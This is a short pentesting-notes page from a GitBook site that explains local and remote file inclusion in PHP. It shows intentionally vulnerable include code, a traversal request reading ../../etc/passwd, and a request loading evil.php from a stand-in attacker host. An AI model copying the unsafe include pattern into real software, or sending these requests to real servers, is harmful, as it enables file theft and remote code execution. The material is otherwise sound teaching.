🚩
Cyber Explained
  • WHOAMI
  • Technologies
    • Docker
      • Setup Docker
      • Terminology
      • Docker Hub
      • Docker Images
      • Docker Containers
      • Working with Containers
      • Virtualization vs Containerization
      • Nutshell
      • Troubleshoot
    • Android Application
      • Application File Structure
      • Layout and Resources for UI
      • Activities
      • Intents
      • Activity lifecycle and state
      • Implicit intents
    • Active Directory
      • Attacking Active Directory: 0 to 0.9
      • Resources
    • Kerberos
  • RED TEAMING
    • Attacking Kerberos
      • User Enum and Brute Force
      • AS-REP Roasting
      • Kerberoasting
    • MITRE ATT&CK
    • Resources
  • PenTesting
    • Android Pentesting
      • Re-Build App
      • Using Frida on Android without root
    • Web Pentesting
      • XSS
      • SQLi
      • Authentication Vulnerabilities
      • Session Security
      • CSRF
      • Path Traversal
      • File Inclusion
      • Business Logic Vulnerabilities
      • HTTP Host header attacks
      • SSRF
      • HTTP Request Smuggling
      • OS command injection
      • Access control vulnerabilities
    • OWASP Testing Guide
      • 1.0 Information Gathering
      • 2.0 Configuration and Deployment Management Testing
      • 3.0 Identity Management Testing
      • 4.0 Authentication Testing
      • 5.0 Authorization Testing
      • 6.0 Session Management Testing
      • 7.0 Input Validation Testing
      • 8.0 Testing for Error Handling
      • 9.0 Testing for Weak Cryptography
      • 10.0 Business Logic Testing
      • 11.0 Client-side Testing
      • 12.0 API Testing
  • Programming
    • Python
      • Hello World !
        • Variables and Data Types
        • Lists, Tuple, Sets and Dictionaries
        • If Statement
        • While Loops
        • For Loops
        • Functions
        • Classes and Objects
        • Creating Modules
        • Creating Packages
        • Exception Handling
      • System Pogramming
        • File Handling
        • OS Interaction with OS Library
        • Multithreading
        • Signals
        • Subprocess
        • Code Examples
      • Network Programming
        • Socket Programming
        • Packet Injection with Raw Sockets
        • SocketServer Framework
        • Packet Sniffing with Scapy
        • Creating a Web Server
        • Packet Injection with Scapy
        • Packet Sniffing with Raw Sockets
        • Programming with Scapy
  • Operating Systems
    • Windows*
    • Linux
      • System Structure
      • VI Text Editor
      • Working with the Linux Shell
      • Managing Users and Groups
      • Managing Files and Directories
  • Networks
    • Page 1
Powered by GitBook
On this page
  1. PenTesting
  2. Web Pentesting

File Inclusion

there is 2 types

Local file inclusion (LFI)

is this case we can exposing or running files on the web server

code ex :

/*** Get the filename from a GET input* Example - http://example.com/?file=filename.php*/$file = $_GET['file'];​/*** Unsafely include the file* Example - filename.php*/include('directory/' . $file);

In the above example, an attacker could make the following request. It tricks the application into executing a PHP script such as a web shell that the attacker managed to upload to the web server.

http://example.com/?file=../../etc/passwd

Remote file inclusion (RFI)

is this case we can dynamically include external files or scripts.

/*** Get the filename from a GET input* Example - http://example.com/?file=index.php*/$file = $_GET['file'];​/*** Unsafely include the file* Example - index.php*/include($file);

Using the above PHP script, an attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example, a backdoor or a webshell.

http://example.com/?file=http://attacker.example.com/evil.php

PreviousPath TraversalNextBusiness Logic Vulnerabilities

Last updated 3 years ago